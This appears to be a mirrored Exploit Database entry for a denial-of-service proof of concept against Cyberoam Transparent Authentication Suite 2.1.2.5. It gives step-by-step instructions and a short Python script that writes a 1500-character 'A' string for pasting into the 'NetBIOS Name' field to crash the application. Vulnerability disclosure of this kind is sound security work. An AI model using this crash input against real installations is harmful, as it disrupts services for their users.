Cyberoam Transparent Authentication Suite 2.1.2.5 – ‘NetBIOS Name’ Denial of Service (PoC)

• Exploit Database
• 117 阅读

• 作者： Victor Mondragón
  日期： 2019-05-24
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46926/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

  #Exploit Title: Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-23 #Vendor Homepage: https://www.cyberoam.com #Software Link: https://download.cyberoam.com/solution/optionals/i18n/CTAS%202.1.2.5%20Release.zip #Tested Version: 2.1.2.5 #Tested on: Windows 7 Service Pack 1 x64   #Steps to produce the crash: #1.- Run python code: ctas_nn_2.1.2.5.py #2.- Open ctas_nn_2.1.2.5.txt and copy content to clipboard #3.- Open Cyberoam Transparent Authentication Suite #4.- Select General > in Domain Type select "Microsoft Active Directory" #5.- In "NetBIOS Name" Paste Clipboard #6.- Click on "Apply" #7.- Crashed!   cod = "\x41" * 1500   f = open('ctas_nn_2.1.2.5.txt', 'w') f.write(cod) f.close()